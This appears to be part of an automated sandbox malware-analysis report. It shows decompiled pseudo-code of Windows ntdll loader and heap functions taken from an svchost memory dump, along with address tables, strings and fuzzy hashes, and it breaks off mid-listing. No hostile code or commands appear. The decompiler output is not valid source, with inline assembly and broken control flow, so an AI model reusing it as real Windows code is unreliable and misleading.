                        • Instruction Fuzzy Hash: 7622D374B02246DFEB28DF28C484BBABBF5EF45704F1885AAE4568B381D735D981CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03038794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                        Download Yara Rule
                        C-Code - Quality: 83%
                        			E03038794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0303934A() != 0) {
								_t159 = E030AA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x3115780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E030A5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x3115780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0303849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E03038999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E03038999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x3115c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x3115c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E03042280(_t92, 0x31186cc);
															_t94 = E030F9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E030561A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x3115c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E03038A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x3115c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x3115c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0306F380(_t136, 0x3001184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E03042280(_t108, 0x31186cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E030561A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E030F9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0303FFB0(_t118, _t156, 0x31186cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E03069A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                        0x03038799
                        0x0303879d
                        0x030387a1
                        0x030387a3
                        0x030387a8
                        0x030387c3
                        0x030387c3
                        0x030387c8
                        0x030387d1
                        0x030387d4
                        0x030387d8
                        0x030387e5
                        0x030387ec
                        0x03089bfe
                        0x03089c00
                        0x03089c02
                        0x03089c08
                        0x03089c0d
                        0x03089c0f
                        0x03089c14
                        0x03089c2d
                        0x03089c32
                        0x03089c37
                        0x03089c3a
                        0x03089c3c
                        0x03089c42
                        0x03089c42
                        0x03089c3c
                        0x03089c02
                        0x030387da
                        0x030387df
                        0x030387e3
                        0x00000000
                        0x00000000
                        0x030387e3
                        0x030387f2
                        0x00000000
                        0x030387fb
                        0x030387fd
                        0x030387fe
                        0x0303880e
                        0x0303880f
                        0x03038810
                        0x03038814
                        0x0303881a
                        0x0303881c
                        0x0303881f
                        0x03038821
                        0x03038822
                        0x03038824
                        0x03038826
                        0x0303882c
                        0x0303882e
                        0x03089c48
                        0x03089c48
                        0x03038834
                        0x03038834
                        0x03038837
                        0x00000000
                        0x00000000
                        0x03038837
                        0x0303882e
                        0x0303883d
                        0x03038840
                        0x03038843
                        0x03038846
                        0x03038849
                        0x0303884c
                        0x0303884e
                        0x03038850
                        0x03038852
                        0x03038854
                        0x03038857
                        0x030388b4
                        0x030388b6
                        0x030388b6
                        0x03038859
                        0x03038859
                        0x03038859
                        0x03038861
                        0x03038866
                        0x0303886a
                        0x0303893d
                        0x03038941
                        0x00000000
                        0x03038947
                        0x03038947
                        0x0303894a
                        0x0303894c
                        0x00000000
                        0x03038952
                        0x03038955
                        0x0303895a
                        0x0303895d
                        0x0303895d
                        0x0303895f
                        0x03038961
                        0x03038961
                        0x03038968
                        0x00000000
                        0x00000000
                        0x0303896a
                        0x0303896b
                        0x0303896e
                        0x00000000
                        0x03038970
                        0x03038970
                        0x03038970
                        0x03038970
                        0x03038972
                        0x03038972
                        0x03038974
                        0x00000000
                        0x0303897a
                        0x0303897a
                        0x0303897d
                        0x00000000
                        0x03038983
                        0x03089c65
                        0x03089c6d
                        0x03089c72
                        0x03089c75
                        0x03089c75
                        0x03089c82
                        0x03089c86
                        0x03089c87
                        0x03089c88
                        0x03089c89
                        0x03089c8c
                        0x03089c90
                        0x03089c95
                        0x03089c97
                        0x03089ca0
                        0x03089ca3
                        0x03089ca9
                        0x03089ca9
                        0x00000000
                        0x03089ca9
                        0x03089ca3
                        0x00000000
                        0x03089c97
                        0x0303897d
                        0x00000000
                        0x03038974
                        0x03038988
                        0x03038992
                        0x03038996
                        0x00000000
                        0x03038996
                        0x0303894c
                        0x00000000
                        0x03038870
                        0x0303887b
                        0x0303887d
                        0x0303887f
                        0x03038881
                        0x03038884
                        0x03038884
                        0x03038886
                        0x03038889
                        0x0303888c
                        0x0303888e
                        0x03038891
                        0x03038891
                        0x03038898
                        0x00000000
                        0x00000000
                        0x0303889a
                        0x0303889b
                        0x0303889e
                        0x00000000
                        0x00000000
                        0x030388a0
                        0x030388a8
                        0x030388b0
                        0x030388b2
                        0x030388d3
                        0x030388d5
                        0x00000000
                        0x030388d7
                        0x030388db
                        0x030388dc
                        0x030388e0
                        0x030388e8
                        0x030388ee
                        0x030388f0
                        0x030388f3
                        0x030388fc
                        0x03038901
                        0x03038906
                        0x0303890c
                        0x0303890c
                        0x0303890f
                        0x03038916
                        0x03038917
                        0x03038918
                        0x03038919
                        0x0303891a
                        0x0303891f
                        0x03038921
                        0x03089c52
                        0x03089c55
                        0x03089c5b
                        0x03089cac
                        0x03089cc0
                        0x03089cc0
                        0x03089c55
                        0x03038927
                        0x03038927
                        0x0303892f
                        0x03038933
                        0x00000000
                        0x030388f5
                        0x030388f5
                        0x00000000
                        0x030388f7
                        0x030388f7
                        0x030388fa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x030388fa
                        0x030388f5
                        0x030388f3
                        0x00000000
                        0x030388d5
                        0x00000000
                        0x030388b2
                        0x030388c9
                        0x00000000
                        0x030388c9
                        0x0303887f
                        0x0303886a
                        0x03038857
                        0x03038852
                        0x030388bf
                        0x030388bf
                        0x030387aa
                        0x030387ad
                        0x030387ae
                        0x030387b4
                        0x030387b5
                        0x030387b6
                        0x030387b8
                        0x030387bd
                        0x030387c1
                        0x030387f4
                        0x030387fa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x030387c1
                        0x00000000

                        Strings
                        • minkernel\ntdll\ldrsnap.c, xrefs: 03089C28
                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 03089C18
                        • LdrpDoPostSnapWork, xrefs: 03089C1E
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                        • API String ID: 0-1948996284
                        • Opcode ID: 08bc378b30c4e825c5040941e5ea6cac67b831b5ef98a1624c407dc22869f69b
                        • Instruction ID: 86caa6d1c836a3ec81476ed292d8ebdb074523edb43156ba8b1d0ebbf04c8030
                        • Opcode Fuzzy Hash: 08bc378b30c4e825c5040941e5ea6cac67b831b5ef98a1624c407dc22869f69b
                        • Instruction Fuzzy Hash: 7E91F871A022199FDB58DF58C481ABEB3FDFF86310B5881E9F945AB240D731E949CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0305AC7B Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                        Download Yara Rule
                        C-Code - Quality: 80%
                        			E0305AC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E0307D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x3118a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E030696E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E030D3C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E030696E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E0302B150();
							} else {
								E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E0302B150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E030E14FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E03047D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E030E1411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E03047D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E030E1411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                        0x0305ac85
                        0x0305ac88
                        0x0305ac8a
                        0x0305ac8d
                        0x0305ac91
                        0x0305ac99
                        0x0305ac9c
                        0x03099f57
                        0x03099f5b
                        0x03099f60
                        0x03099f60
                        0x0305aca8
                        0x0305acae
                        0x0305acda
                        0x0305acde
                        0x0305ace8
                        0x0305aceb
                        0x0305acee
                        0x00000000
                        0x0305acee
                        0x0305acf6
                        0x0305acb0
                        0x0305acb0
                        0x0305acbb
                        0x0305acbd
                        0x0305acc0
                        0x0305acc5
                        0x0305adae
                        0x0305adb4
                        0x0305adb4
                        0x0305acd4
                        0x0305acd8
                        0x0305acf9
                        0x0305acff
                        0x0305ad04
                        0x0305ad08
                        0x0305ad09
                        0x0305ad10
                        0x0305ad12
                        0x0305ad18
                        0x03099f6f
                        0x03099f74
                        0x03099f76
                        0x03099f7c
                        0x03099f84
                        0x03099f88
                        0x03099f89
                        0x03099f90
                        0x03099f90
                        0x03099f76
                        0x0305ad1e
                        0x0305ad24
                        0x0305ad26
                        0x0309a097
                        0x0309a09b
                        0x0309a0ba
                        0x0309a0bf
                        0x0309a09d
                        0x0309a0b2
                        0x0309a0b7
                        0x0309a0c5
                        0x0309a0c8
                        0x0309a0cb
                        0x0309a0d2
                        0x00000000
                        0x0305ad2c
                        0x0305ad2c
                        0x0305ad2f
                        0x0305ad34
                        0x0305ad36
                        0x03099f97
                        0x03099f9a
                        0x00000000
                        0x00000000
                        0x03099fa9
                        0x0305ad3e
                        0x0305ad3e
                        0x0305ad41
                        0x03099fb3
                        0x03099fb9
                        0x03099fc0
                        0x03099fd0
                        0x03099fd0
                        0x03099fc0
                        0x0305ad4a
                        0x0305ad50
                        0x0305ad5c
                        0x0305ad62
                        0x0305ad68
                        0x0305ad6b
                        0x0305ad6d
                        0x03099fda
                        0x03099fdd
                        0x00000000
                        0x00000000
                        0x03099fec
                        0x00000000
                        0x0305ad73
                        0x0305ad73
                        0x0305ad73
                        0x0305ad75
                        0x0305ad75
                        0x0305ad78
                        0x03099ff6
                        0x03099ffc
                        0x0309a003
                        0x0309a00e
                        0x0309a010
                        0x0309a01b
                        0x0309a01b
                        0x0309a01b
                        0x0309a038
                        0x0309a038
                        0x0309a003
                        0x0305ad84
                        0x0305ad89
                        0x0305ad8c
                        0x0305ad8e
                        0x0309a042
                        0x0309a045
                        0x00000000
                        0x00000000
                        0x0309a054
                        0x00000000
                        0x0305ad94
                        0x0305ad94
                        0x0305ad94
                        0x0305ad96
                        0x0305ad96
                        0x0305ad99
                        0x0309a063
                        0x0309a065
                        0x0309a070
                        0x0309a070
                        0x0309a070
                        0x0309a08d
                        0x0309a08d
                        0x0305ada4
                        0x0305ada6
                        0x00000000
                        0x0305ada6
                        0x0305ad8e
                        0x0305ad6d
                        0x0305ad3c
                        0x0305ad3c
                        0x00000000
                        0x0305ad3c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0305acd8

                        Strings
                        • HEAP: , xrefs: 0309A0BA
                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0309A0CD
                        • HEAP[%wZ]: , xrefs: 0309A0AD
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                        • API String ID: 0-1340214556
                        • Opcode ID: 55b2294cc12bc38cf38cb31094f906b9eff8f4231a6286ad257cb1169451ab5d
                        • Instruction ID: 346686c0f616a5f9a37ac41f1025b1cd6c31912b8d9256abba3eaec9f6867de0
                        • Opcode Fuzzy Hash: 55b2294cc12bc38cf38cb31094f906b9eff8f4231a6286ad257cb1169451ab5d
                        • Instruction Fuzzy Hash: 50812A35302684EFDB26DB68C894BAABBF8FF44310F0845A5F9528B791D774E940DB20
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0304B73D Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                        Download Yara Rule
                        C-Code - Quality: 74%
                        			E0304B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E030EA80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x3118748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E0302B150();
					} else {
						E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E0302B150();
					__eflags =  *0x3117bc8;
					if(__eflags == 0) {
						E030E2073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E030EA80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x3118720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x3118720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E0304B8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E030EA80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E0304E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}






























                        0x0304b746
                        0x0304b74b
                        0x0304b74d
                        0x0304b750
                        0x0304b755
                        0x0304b758
                        0x0304b758
                        0x0304b75e
                        0x0304b763
                        0x0304b764
                        0x0304b76a
                        0x0304b76d
                        0x0304b771
                        0x0304b776
                        0x0304b85c
                        0x0304b85d
                        0x0304b860
                        0x0304b865
                        0x03092ba1
                        0x03092ba2
                        0x03092ba9
                        0x03092bae
                        0x03092bae
                        0x0304b77c
                        0x0304b77c
                        0x0304b77c
                        0x0304b785
                        0x0304b788
